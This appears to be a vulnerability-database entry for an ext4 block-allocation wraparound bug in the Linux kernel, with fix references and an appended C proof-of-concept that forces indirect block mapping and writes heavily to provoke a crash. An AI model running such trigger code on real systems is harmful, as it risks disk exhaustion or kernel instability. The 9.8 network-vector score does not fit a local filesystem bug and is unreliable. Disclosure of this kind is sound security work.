Security Vulnerability Report
CVE-2026-43067 CVSS 9.8 CRITICAL

CVE-2026-43067

Published: 2026-05-05 16:16:16
Last Modified: 2026-05-08 13:16:38
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ext4: handle wraparound when searching for blocks for indirect mapped blocks

Commit 4865c768b563 ("ext4: always allocate blocks only from groups inode can use") restricts what blocks will be allocated for indirect block based files to block numbers that fit within 32-bit block numbers.

However, when using a review bot running on the latest Gemini LLM to check this commit when backporting into an LTS based kernel, it raised this concern:

    If ac->ac_g_ex.fe_group is >= ngroups (for instance, if the goal group was populated via stream allocation from s_mb_last_groups), then start will be >= ngroups.

    Does this allow allocating blocks beyond the 32-bit limit for indirect block mapped files? The commit message mentions that ext4_mb_scan_groups_linear() takes care to not select unsupported groups. However, its loop uses group = *start, and the very first iteration will call ext4_mb_scan_group() with this unsupported group because next_linear_group() is only called at the end of the iteration.

After reviewing the code paths involved and considering the LLM review, I determined that this can happen when there is a file system where some files/directories are extent-mapped and others are indirect-block mapped. To address this, add a safety clamp in ext4_mb_scan_groups().

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (versions containing the unfixed vulnerability)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/fs.h>

/* PoC to trigger the block allocation path for indirect blocks.
 * It attempts to force the kernel into the vulnerable code path by
 * creating a file on an ext4 filesystem, clearing its extents flag so
 * that ext4 migrates the (still empty) inode to indirect block mapping,
 * and then writing enough data to exercise the multiblock allocator.
 * FS_IOC_GETFLAGS, FS_IOC_SETFLAGS and FS_EXTENT_FL are provided by
 * <linux/fs.h>; they must not be redefined here. */

int main(void)
{
    int fd = open("/mnt/test/vuln_file", O_CREAT | O_WRONLY | O_TRUNC, 0644);
    if (fd < 0) {
        perror("open failed");
        return 1;
    }

    /* Clear the extents flag to force indirect block mapping. */
    long flags = 0;
    if (ioctl(fd, FS_IOC_GETFLAGS, &flags) < 0) {
        perror("ioctl get failed");
        close(fd);
        return 1;
    }
    flags &= ~FS_EXTENT_FL;
    if (ioctl(fd, FS_IOC_SETFLAGS, &flags) < 0) {
        perror("ioctl set failed");
        close(fd);
        return 1;
    }

    /* Write data to trigger the block allocation logic. */
    char buffer[4096];
    memset(buffer, 0, sizeof(buffer));
    for (int i = 0; i < 100000; i++) {
        if (write(fd, buffer, sizeof(buffer)) < 0) {
            perror("write failed");
            break;
        }
    }

    close(fd);
    printf("PoC executed. Check kernel logs for crashes.\n");
    return 0;
}

References

https://git.kernel.org/stable/c/12624c5b724a81e14e532972b40d863b0de3b7d1
https://git.kernel.org/stable/c/2a368ccddfc492a0aa951e2caef2985f20e96503
https://git.kernel.org/stable/c/4bec4a498ce86314d470ae6144120461f2138c29
https://git.kernel.org/stable/c/83170a05908b6cf2fb3235d3065bf613ff866f3c
https://git.kernel.org/stable/c/bb81702370fad22c06ca12b6e1648754dbc37e0f
https://git.kernel.org/stable/c/f89bba144938921a2249237ad04a0183ff3f8930

Record Status

Vulnerability Status: Awaiting Analysis
Exploitability Score: 3.9
Impact Score: 5.9